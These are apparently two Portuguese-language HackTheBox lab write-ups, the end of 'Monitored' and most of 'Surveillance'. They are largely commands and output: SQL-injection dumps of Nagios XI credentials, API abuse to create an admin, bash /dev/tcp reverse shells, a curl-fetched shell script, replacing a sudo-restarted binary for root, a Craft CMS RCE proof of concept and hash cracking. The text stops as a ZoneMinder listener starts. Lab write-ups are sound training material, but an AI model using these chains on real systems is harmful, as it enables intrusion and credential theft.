Aqui temos o retorno de todas as tabelas de todos os bancos existentes, que são information_schema e nagiosxi.
Buscando credenciais podemos visualizar o conteúdo da tabela xi_users do banco de dados nagiosxi:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/monitored]
└─# sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=eca836b1c8d71116d87c8436cf5c2c45236b3f29" --batch -D nagiosxi -T xi_users --dump
...
Database: nagiosxi
Table: xi_users
[2 entries]
+---------+---------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| user_id | email               | name                 | api_key                                                          | enabled | password                                                     | username    | created_by | last_login | api_enabled | last_edited | created_time | last_attempt | backend_ticket                                                   | last_edited_by | login_attempts | last_password_change |
+---------+---------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| 1       | admin@monitored.htb | Nagios Administrator | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL | 1       | $2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C | nagiosadmin | 0          | 1701931372 | 1           | 1701427555  | 0            | 0            | IoAaeXNLvtDkH5PaGqV2XZ3vMZJLMDR0                                 | 5              | 0              | 1701427555           |
| 2       | svc@monitored.htb   | svc                  | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK | 0       | $2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK | svc         | 1          | 1699724476 | 1           | 1699728200  | 1699634403   | 1705260273   | 6oWBPbarHY4vejimmu3K8tpZBNrdHpDgdUEs5P2PFZYpXSuIdrRMYgk66A0cjNjq | 1              | 5              | 1699697433           |
+---------+---------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+

Com o token do admin conseguimos acesso como admin na api, e assim conseguimos criar um usuário para interface com o seguinte comando:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/monitored]
└─# curl -XPOST --insecure "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=mrntsgs&password=mrtnsgs&name=mrtnsgs&email=mrtnsgs@localhost&auth_level=admin"
{
    "success": "User account mrntsgs was added successfully!",
    "user_id": 6
}

Com isso conseguimos logar na interface:

No primeiro acesso será solicitado a troca da senha do novo usuário:

E agora temos acesso a interface:

O Nagios possuí diversas funcionalidades para monitorar hosts e serviços, dentre estes podemos utilizar comandos de checagem, ja existem alguns pré-definidos e podemos criar novos.

Para isso vamos acessar em Starting Monitoring -> Advanced Config:

Na próxima tela vamos acessar Commands:

E aqui temos diversos comandos ja pré definidos:

Visando conseguir um shell podemos criar dois comandos para o localhost que ira realizar o download e executar nossa reverse shell. Para isso vamos clicar em + Add New e adicionar o seguinte comando:

curl http://10.10.14.128:8081/rev.sh -o /tmp/rev.sh

Um ponto de atenção é manter o Command Type como check command, para que fique disponível para execução que iremos ver logo a seguir.

Basta clicar em Save e na próxima tela em Apply Configuration.

Este primeiro comando ira baixar o reverse shell e salvar no diretório /tmp. Precisamos agora adicionar outro comando, que executará o script contendo nosso reverse shell:

bash /tmp/rev.sh

Seguindo os mesmos procedimentos teremos os dois comandos abaixo:

Não esquecer de clicar em Apply Configuration!

Precisamos criar o arquivo rev.sh com o seguinte conteúdo:

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.128/9001 0>&1

No terminal iremos subir um servidor http usando python, para que seja possível o download proveniente do alvo:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/monitored]
└─# python3 -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...

Em outra aba do terminal iremos utilizar o pwncat para receber a conexão reversa quando executarmos o segundo comando:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/monitored]
└─# pwncat-cs -lp 9001
[13:45:22] Welcome to pwncat 🐈!

Precisamos partir para a execução dos comandos, iremos na coluna a direita iremos em Monitoring -> Hosts:

Iremos clicar em localhost. Aqui temos diversas configurações para o host, onde nesse caso é nosso alvo. Na aba Check Command iremos buscar nossos comandos revshell-download e revshell-download.

Primeiro iremos executar o download do arquivo, para isso iremos clicar em Run Check Command, que irá abrir uma opção e iremos clicar novamente em Run Check Command, que executará nosso comando:

Confirmamos o RCE em nosso servidor http que recebeu a requisição:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/monitored]
└─# python3 -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
10.129.130.92 - - [17/Jan/2024 14:05:46] "GET /rev.sh HTTP/1.1" 200 -

Com o arquivo em nosso alvo, agora iremos executar nosso comando revshell-exec.
E temos o seguinte retorno no pwncat:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/monitored]
└─# pwncat-cs -lp 9001
[13:45:22] Welcome to pwncat 🐈!                            __main__.py:164
[14:09:50] received connection from 10.129.130.92:37844     bind.py:84
[14:09:53] 0.0.0.0:9001: normalizing shell path             manager.py:957
[14:09:57] 10.129.130.92:37844: registered new host w/ db   manager.py:957
(local) pwncat$

Conseguimos um shell em nosso alvo com o usuário nagios. Com isso conseguimos a user flag:

(local) pwncat$                                       
(remote) nagios@monitored:/home/nagios$ ls -alh
total 24K
drwxr-xr-x 4 nagios nagios 4.0K Jan 17 13:07 .
drwxr-xr-x 4 root   root   4.0K Nov  9 10:38 ..
lrwxrwxrwx 1 root   root      9 Nov 11 10:57 .bash_history -> /dev/null
-rw-r--r-- 1 nagios nagios  131 Jan 17 13:07 cookie.txt
drwxr-xr-x 3 nagios nagios 4.0K Nov 10 14:25 .local
drwx------ 2 nagios nagios 4.0K Dec  7 03:18 .ssh
-rw-r----- 1 root   nagios   33 Jan 17 13:02 user.txt
(remote) nagios@monitored:/home/nagios$ cat user.txt 
059547ca5b222c5d654b3d3947538967

Privilege Escalation e Root flag

Iniciando um recon do nosso alvo encontramos os seguintes comandos que o usuários nagios pode executar com permissões de root e sem necessidade de utilizar senha:

(remote) nagios@monitored:/home/nagios$ sudo -l
Matching Defaults entries for nagios on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nagios may run the following commands on localhost:
    (root) NOPASSWD: /etc/init.d/nagios start
    (root) NOPASSWD: /etc/init.d/nagios stop
    (root) NOPASSWD: /etc/init.d/nagios restart
    (root) NOPASSWD: /etc/init.d/nagios reload
    (root) NOPASSWD: /etc/init.d/nagios status
    (root) NOPASSWD: /etc/init.d/nagios checkconfig
    (root) NOPASSWD: /etc/init.d/npcd start
    (root) NOPASSWD: /etc/init.d/npcd stop
    (root) NOPASSWD: /etc/init.d/npcd restart
    (root) NOPASSWD: /etc/init.d/npcd reload
    (root) NOPASSWD: /etc/init.d/npcd status
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php *
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/migrate/migrate.php *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *

Os arquivos listados que estão no diretório /etc/init.d/ não existem e como usuário nagios não temos permissão para criar. Os demais scripts podemos executar, mas não altera-los.

Visando uma enumeração do ambiente por completo iremos executar o script linpeas, que irá automatizar o procedimento.

Basta realizar o upload, dar permissão de execução e executar. O linpeas é um shell script.

Analisando a saída do arquivo temos uma parte que é interessante:

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#services                                                                        
/etc/systemd/system/multi-user.target.wants/nagios.service is calling this writable executable: /usr/local/nagios/bin/nagios                  
/etc/systemd/system/multi-user.target.wants/nagios.service is calling this writable executable: /usr/local/nagios/bin/nagios
/etc/systemd/system/multi-user.target.wants/nagios.service is calling this writable executable: /usr/local/nagios/bin/nagios
/etc/systemd/system/multi-user.target.wants/npcd.service is calling this writable executable: /usr/local/nagios/bin/npcd
/etc/systemd/system/npcd.service is calling this writable executable: /usr/local/nagios/bin/npcd
You can't write on systemd PATH

Os dois arquivos contidos em /etc/systemd/system/multi-user.target.wants/ são arquivos utilizados pelo systemd para administrar programas, eles são responsáveis pelos parâmetros de execução, neste caso do nagios e do npcd.
No caso da saída acima vemos que ambos apontam para binários que nosso usuário tem permissão de escrita, no entanto nosso usuário nagios não tem permissão para reiniciar, parar ou iniciar programas através do systemctl:

(remote) nagios@monitored:/home/nagios$ systemctl restart nagios
Failed to restart nagios.service: Access denied
See system logs and 'systemctl status nagios.service' for details.

Porém entre os scripts listados no sudo -l que nosso usuário pode executar com permissões de root consta o seguinte:

(remote) nagios@monitored:/home/nagios$ sudo /usr/local/nagiosxi/scripts/manage_services.sh
First parameter must be one of: start stop restart status reload checkconfig enable disable

Este por sua vez serve para gerenciar serviços, seja start, stop, reload e etc.
Analisando o script vemos que conseguimos através do mesmo reiniciar controlar a execução tanto do nagios quando do npcd e outros:

(remote) nagios@monitored:/home/nagios$ sudo /usr/local/nagiosxi/scripts/manage_services.sh restart
Second parameter must be one of: postgresql httpd mysqld nagios ndo2db npcd snmptt ntpd crond shellinaboxd snmptrapd php-fpm

Podemos substituir um destes binários por um script que executará como root, este script pode ser um reverse shell por exemplo:

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.128/9002 0>&1

Como ja estamos utilizando a porta 9001, para este outro reverse shell iremos utilizar a porta 9002. Após criar o arquivo iremos dar permissão de execução e substituir o atual arquivo npcd:

(remote) nagios@monitored:/home/nagios$ vi npcd
(remote) nagios@monitored:/home/nagios$ chmod +x npcd 
(remote) nagios@monitored:/home/nagios$ mv /usr/local/nagios/bin/npcd{,.bak}
(remote) nagios@monitored:/home/nagios$ cp npcd /usr/local/nagios/bin/
(remote) nagios@monitored:/home/nagios$ cat /usr/local/nagios/bin/npcd
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.128/9002 0>&1

Agora em outra aba do terminal iremos utilizar novamente o pwncat para ouvir na porta 9002:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/monitored]
└─# pwncat-cs -lp 9002         
[14:27:31] Welcome to pwncat 🐈!

E executar o script manage_services.sh:

(remote) nagios@monitored:/home/nagios$ sudo /usr/local/nagiosxi/scripts/manage_services.sh restart npcd
(remote) nagios@monitored:/home/nagios$

Com isso temos o seguinte retorno no novo pwncat como usuário root, conseguindo assim a root flag:

(local) pwncat$                                                                                                              
(remote) root@monitored:/# id
uid=0(root) gid=0(root) groups=0(root)
(remote) root@monitored:/# ls -a /root/
.  ..  .bash_history  .bashrc  .cache  .config  .cpan  .gnupg  .local  .profile  root.txt  .ssh
(remote) root@monitored:/# cat /root/root.txt 
01afe731595a5fed86f858423165f80e

Finalizando assim a máquina Monitored!

HackTheBox - Writeup Surveillance [Retired]

Guilherme Martins — Sun, 02 Jun 2024 16:42:19 +0000

Hackthebox

Neste writeup iremos explorar uma máquina linux de nível medium chamada Surveillance que aborda as seguintes vulnerabilidades e técnicas de exploração:

CVE-2023-41892 - Remote Code Execution
Password Cracking com hashcat
CVE-2023-26035 - Unauthenticated RCE
Lack of Input Validation

Iremos iniciar realizando uma varredura em nosso alvo a procura de portas abertas através do nmap:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# nmap -sV --open -Pn 10.129.45.83 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 19:11 EST
Nmap scan report for 10.129.45.83
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Com isso podemos notar que existem duas portas, a porta 22 do ssh e a 80 que esta rodando um nginx.

O nginx é um servidor web e proxy reverso, vamos acessar nosso alvo por um navegador.

Quando acessamos somos redirecionados para http://surveillance.htb, vamos adicionar em nosso /etc/hosts.

Com isso temos a seguinte págine web:

Se trata de um site de uma empresa de segurança e monitoramento que dispõe de câmeras, controle de acessos e etc.

Agora iremos em busca de endpoint e diretórios utilizando o gobuster:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://surveillance.htb/ -k 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://surveillance.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/12/11 19:12:59 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 200) [Size: 304]
/admin                (Status: 302) [Size: 0] [--> http://surveillance.htb/admin/login]
/css                  (Status: 301) [Size: 178] [--> http://surveillance.htb/css/]
/fonts                (Status: 301) [Size: 178] [--> http://surveillance.htb/fonts/]
/images               (Status: 301) [Size: 178] [--> http://surveillance.htb/images/]
/img                  (Status: 301) [Size: 178] [--> http://surveillance.htb/img/]
/index                (Status: 200) [Size: 1]
/js                   (Status: 301) [Size: 178] [--> http://surveillance.htb/js/]
/logout               (Status: 302) [Size: 0] [--> http://surveillance.htb/]
/p13                  (Status: 200) [Size: 16230]
/p1                   (Status: 200) [Size: 16230]
/p10                  (Status: 200) [Size: 16230]
/p15                  (Status: 200) [Size: 16230]
/p2                   (Status: 200) [Size: 16230]
/p3                   (Status: 200) [Size: 16230]
/p7                   (Status: 200) [Size: 16230]
/p5                   (Status: 200) [Size: 16230]
/wp-admin             (Status: 418) [Size: 24409]
Progress: 20469 / 20470 (100.00%)
===============================================================

Aqui temos alguns endpoints interessantes, dentre eles temos o /admin. Aqui conseguimos identificar a CMS que o site foi criado, podemos constatar que se trata de um Craft CMS:

De acordo com o próprio site do Craft CMS, o Craft é um CMS flexível e fácil de usar para criar experiências digitais personalizadas na web e fora dela.

Buscando por vulnerabilidades encontramos a CVE-2023-41892 que é um Remote Code Execution.
Essa vulnerabilidade recebeu um score perfeito 10 de 10 no Common Vulnerability Scoring System (CVSS), é um Pre-Auth RCE que pode ser executado de forma totalmente remota.

Aqui temos uma proof-of-concept criada em python:

https://gist.github.com/to016/b796ca3275fa11b5ab9594b1522f7226

Com esta poc conseguimos acesso via shell com o usuário www-data:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# python3 CVE-2023-41892.py http://surveillance.htb/
[-] Get temporary folder and document root ...
[-] Write payload to temporary file ...
[-] Trigger imagick to write shell ...
[-] Done, enjoy the shell
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Como temos um shell com poucos recursos, vamos abrir em outra aba o pwncat, que é um shell com diversas funções:

┌──(root㉿kali)-[/home/kali]
└─# pwncat-cs -lp 9001
[16:57:07] Welcome to pwncat 🐈!                                                                                                     __main__.py:164

Agora vamos criar um arquivo chamado rev.sh em nosso alvo com o seguinte conteúdo e executar:

$ cat /tmp/rev.sh
sh -i 5<> /dev/tcp/10.10.14.229/9001 0<&5 1>&5 2>&5
$ bash /tmp/rev

Com isso temos nosso reserve shell no pwncat:

┌──(root㉿kali)-[/home/kali]
└─# pwncat-cs -lp 9001
[16:57:07] Welcome to pwncat 🐈!                                                                                                     __main__.py:164
[17:00:52] received connection from 10.129.39.90:48380                                                                                    bind.py:84
[17:00:57] 0.0.0.0:9001: upgrading from /usr/bin/dash to /usr/bin/bash                                                                manager.py:957
[17:01:00] 10.129.39.90:48380: registered new host w/ db                                                                              manager.py:957
(local) pwncat$                                                                                                                                     
(remote) www-data@surveillance:/var/www/html/craft/web/cpresources$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Com acesso podemos realizar uma enumeração e visualizando os usuários:

(remote) www-data@surveillance:/var/www/html/craft$ grep -i bash /etc/passwd
root:x:0:0:root:/root:/bin/bash
matthew:x:1000:1000:,,,:/home/matthew:/bin/bash
zoneminder:x:1001:1001:,,,:/home/zoneminder:/bin/bash

Aqui temos três usuários: matthew, zoneminder e root.

Buscando arquivos sensíveis encontramos o arquivo .env, que como o nome sugere é um arquivo contendo variáveis e seus valores, que a aplicação utiliza:

(remote) www-data@surveillance:/var/www/html/craft$ cat .env
# Read about configuration, here:
# https://craftcms.com/docs/4.x/config/

# The application ID used to to uniquely store session and cache data, mutex locks, and more
CRAFT_APP_ID=CraftCMS--070c5b0b-ee27-4e50-acdf-0436a93ca4c7

# The environment Craft is currently running in (dev, staging, production, etc.)
CRAFT_ENVIRONMENT=production

# The secure key Craft will use for hashing and encrypting data
CRAFT_SECURITY_KEY=2HfILL3OAEe5X0jzYOVY5i7uUizKmB2_

# Database connection settings
CRAFT_DB_DRIVER=mysql
CRAFT_DB_SERVER=127.0.0.1
CRAFT_DB_PORT=3306
CRAFT_DB_DATABASE=craftdb
CRAFT_DB_USER=craftuser
CRAFT_DB_PASSWORD=CraftCMSPassword2023!
CRAFT_DB_SCHEMA=
CRAFT_DB_TABLE_PREFIX=

# General settings (see config/general.php)
DEV_MODE=false
ALLOW_ADMIN_CHANGES=false
DISALLOW_ROBOTS=false

PRIMARY_SITE_URL=http://surveillance.htb/

Enumerando as portas abertas no host alvo notamos que existe um mysql na porta 3306 e outra aplicação na porta 8080, ambas rodando localmente:

(remote) www-data@surveillance:/var/www/html/craft$ netstat -nltp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      991/nginx: worker p
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      991/nginx: worker p
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
(remote) www-data@surveillance:/var/www/html/craft$

Com os dados que conseguimos podemos acessar o banco de dados:

(remote) www-data@surveillance:/var/www/html/craft$ mysql -u craftuser -h 127.0.0.1 -P 3306 -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 20621
Server version: 10.6.12-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| craftdb            |
| information_schema |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> use craftdb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [craftdb]> show tables;
+----------------------------+
| Tables_in_craftdb          |
+----------------------------+
| addresses                  |
| announcements              |
| assetindexdata             |
| assetindexingsessions      |
| assets                     |
| categories                 |
| categorygroups             |
| categorygroups_sites       |
| changedattributes          |
| changedfields              |
| content                    |
| craftidtokens              |
| deprecationerrors          |
| drafts                     |
| elements                   |
| elements_sites             |
| entries                    |
| entrytypes                 |
| fieldgroups                |
| fieldlayoutfields          |
| fieldlayouts               |
| fieldlayouttabs            |
| fields                     |
| globalsets                 |
| gqlschemas                 |
| gqltokens                  |
| imagetransformindex        |
| imagetransforms            |
| info                       |
| matrixblocks               |
| matrixblocks_owners        |
| matrixblocktypes           |
| migrations                 |
| plugins                    |
| projectconfig              |
| queue                      |
| relations                  |
| resourcepaths              |
| revisions                  |
| searchindex                |
| sections                   |
| sections_sites             |
| sequences                  |
| sessions                   |
| shunnedmessages            |
| sitegroups                 |
| sites                      |
| structureelements          |
| structures                 |
| systemmessages             |
| taggroups                  |
| tags                       |
| tokens                     |
| usergroups                 |
| usergroups_users           |
| userpermissions            |
| userpermissions_usergroups |
| userpermissions_users      |
| userpreferences            |
| users                      |
| volumefolders              |
| volumes                    |
| widgets                    |
+----------------------------+
63 rows in set (0.001 sec)

MariaDB [craftdb]> desc users;
+----------------------------+---------------------+------+-----+---------+-------+
| Field                      | Type                | Null | Key | Default | Extra |
+----------------------------+---------------------+------+-----+---------+-------+
| id                         | int(11)             | NO   | PRI | NULL    |       |
| photoId                    | int(11)             | YES  | MUL | NULL    |       |
| active                     | tinyint(1)          | NO   | MUL | 0       |       |
| pending                    | tinyint(1)          | NO   | MUL | 0       |       |
| locked                     | tinyint(1)          | NO   | MUL | 0       |       |
| suspended                  | tinyint(1)          | NO   | MUL | 0       |       |
| admin                      | tinyint(1)          | NO   |     | 0       |       |
| username                   | varchar(255)        | YES  | MUL | NULL    |       |
| fullName                   | varchar(255)        | YES  |     | NULL    |       |
| firstName                  | varchar(255)        | YES  |     | NULL    |       |
| lastName                   | varchar(255)        | YES  |     | NULL    |       |
| email                      | varchar(255)        | YES  | MUL | NULL    |       |
| password                   | varchar(255)        | YES  |     | NULL    |       |
| lastLoginDate              | datetime            | YES  |     | NULL    |       |
| lastLoginAttemptIp         | varchar(45)         | YES  |     | NULL    |       |
| invalidLoginWindowStart    | datetime            | YES  |     | NULL    |       |
| invalidLoginCount          | tinyint(3) unsigned | YES  |     | NULL    |       |
| lastInvalidLoginDate       | datetime            | YES  |     | NULL    |       |
| lockoutDate                | datetime            | YES  |     | NULL    |       |
| hasDashboard               | tinyint(1)          | NO   |     | 0       |       |
| verificationCode           | varchar(255)        | YES  | MUL | NULL    |       |
| verificationCodeIssuedDate | datetime            | YES  |     | NULL    |       |
| unverifiedEmail            | varchar(255)        | YES  |     | NULL    |       |
| passwordResetRequired      | tinyint(1)          | NO   |     | 0       |       |
| lastPasswordChangeDate     | datetime            | YES  |     | NULL    |       |
| dateCreated                | datetime            | NO   |     | NULL    |       |
| dateUpdated                | datetime            | NO   |     | NULL    |       |
+----------------------------+---------------------+------+-----+---------+-------+
27 rows in set (0.001 sec)

MariaDB [craftdb]> select admin,username,email,password from users;
+-------+----------+------------------------+--------------------------------------------------------------+
| admin | username | email                  | password                                                     |
+-------+----------+------------------------+--------------------------------------------------------------+
|     1 | admin    | admin@surveillance.htb | $2y$13$FoVGcLXXNe81B6x9bKry9OzGSSIYL7/ObcmQ0CXtgw.EpuNcx8tGe |
+-------+----------+------------------------+--------------------------------------------------------------+
1 row in set (0.000 sec)

No entanto, não tivemos sucesso tentando quebrar a hash de usuário.

Continuando a enumeração localizamos um arquivo de backup do banco de dados:

(remote) www-data@surveillance:/var/www/html/craft/storage$ cd backups/
(remote) www-data@surveillance:/var/www/html/craft/storage/backups$ ls -alh
total 28K
drwxrwxr-x 2 www-data www-data 4.0K Oct 17 20:33 .
drwxr-xr-x 6 www-data www-data 4.0K Oct 11 20:12 ..
-rw-r--r-- 1 root     root      20K Oct 17 20:33 surveillance--2023-10-17-202801--v4.4.14.sql.zip
(remote) www-data@surveillance:/var/www/html/craft/storage/backups$ unzip surveillance--2023-10-17-202801--v4.4.14.sql.zip
Archive:  surveillance--2023-10-17-202801--v4.4.14.sql.zip
  inflating: surveillance--2023-10-17-202801--v4.4.14.sql
(remote) www-data@surveillance:/var/www/html/craft/storage/backups$ ls -alh
total 140K
drwxrwxr-x 2 www-data www-data 4.0K Dec 12 02:17 .
drwxr-xr-x 6 www-data www-data 4.0K Oct 11 20:12 ..
-rw-r--r-- 1 www-data www-data 111K Oct 17 20:33 surveillance--2023-10-17-202801--v4.4.14.sql
-rw-r--r-- 1 root     root      20K Oct 17 20:33 surveillance--2023-10-17-202801--v4.4.14.sql.zip

E aqui temos outro tipo de hash para o usuário:

INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46');

Esse tipo de hash é o SHA256 e aqui podemos utilizar o hashcat para quebrar a senha, utilizando o valor 1400 para o tipo de hash e especificando a wordlist rockyou.txt:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# hashcat -m 1400 matthew-hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
...

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344389
* Bytes.....: 139921546
* Keyspace..: 14344389

39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec:starcraft122490

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1400 (SHA2-256)
Hash.Target......: 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c...5770ec
Time.Started.....: Mon Dec 11 21:32:28 2023 (2 secs)
Time.Estimated...: Mon Dec 11 21:32:30 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1596.7 kH/s (0.13ms) @ Accel:256 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3552256/14344389 (24.76%)
Rejected.........: 0/3552256 (0.00%)
Restore.Point....: 3551232/14344389 (24.76%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: starfish789 -> starbowser
Hardware.Mon.#1..: Util: 42%

Started: Mon Dec 11 21:32:04 2023
Stopped: Mon Dec 11 21:32:31 2023

E aqui conseguimos a senha do usuário admin, que é o pertencente a Matthew B. Esse usuário existe no servidor como vimos em nossa enumeração inicial.
Via ssh conseguimos acesso com o usuário matthew!

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# ssh matthew@surveillance.htb
matthew@surveillance.htb's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Dec 12 02:34:21 AM UTC 2023

  System load:  0.08935546875     Processes:             233
  Usage of /:   85.1% of 5.91GB   Users logged in:       0
  Memory usage: 16%               IPv4 address for eth0: 10.129.45.83
  Swap usage:   0%

  => / is using 85.1% of 5.91GB


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


Last login: Tue Dec  5 12:43:54 2023 from 10.10.14.40

E assim conseguimos a user flag.

matthew@surveillance:~$ ls -a
.  ..  .bash_history  .bash_logout  .bashrc  .cache  .profile  user.txt
matthew@surveillance:~$ cat user.txt
b4ddc33ff47b1d8534c59a7609b48f13

Movimentação lateral

Agora que temos acesso ssh com o usuário matthew vamos novamente realizar uma enumeração em busca de uma forma de escalar privilégios para root.

Analisando novos arquivos em busca de dados sensíveis conseguimos os seguintes dados de acesso a outro banco de dados:

-rw-r--r-- 1 root zoneminder 3503 Oct 17 11:32 /usr/share/zoneminder/www/api/app/Config/database.php
        'password' => ZM_DB_PASS,
        'database' => ZM_DB_NAME,
        'host' => 'localhost',
        'password' => 'ZoneMinderPassword2023',
        'database' => 'zm',
                $this->default['host'] = $array[0];
            $this->default['host'] = ZM_DB_HOST;

Estes dados são pertencentes a uma aplicação chamada Zoneminder. O zoneminder é uma aplicação open source para monitoramento via circuito fechado de televisão, câmeras de segurança basicamente.
Um ponto interessante é que temos outro usuário chamado zoneminder e uma aplicação rodando na porta 8080

Buscando por vulnerabilidades conhecidas para o zoneminder encontramos a CVE-2023-26035

A CVE se trata de um Unauthorized Remote Code Execution. Na ação de realizar um snapshot não é validado se a requisição tem permissão para executar, que espera um ID busque um monitor existente, mas permite que seja passado um objeto para criar um novo. A função TriggerOn chamada um shell_exec usando o ID fornecido, gerando assim um RCE.

Para conseguimos executar precisamos criar um túnel para que a aplicação local consiga ser acessada de nossa máquina, para isso vamos utilizar o ssh:

┌──(root�kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# ssh -L 8081:127.0.0.1:8080 matthew@surveillance.htb
matthew@surveillance.htb's password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)

Iremos utilizar neste writeup esta POC.

Primeiramente iremos utilizar o pwncat para ouvir na porta 9002:

┌──(root�kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# pwncat-cs -lp 9002
[21:01:10] Welcome to pwncat 🐈!                                                                                                 __main__.py:164

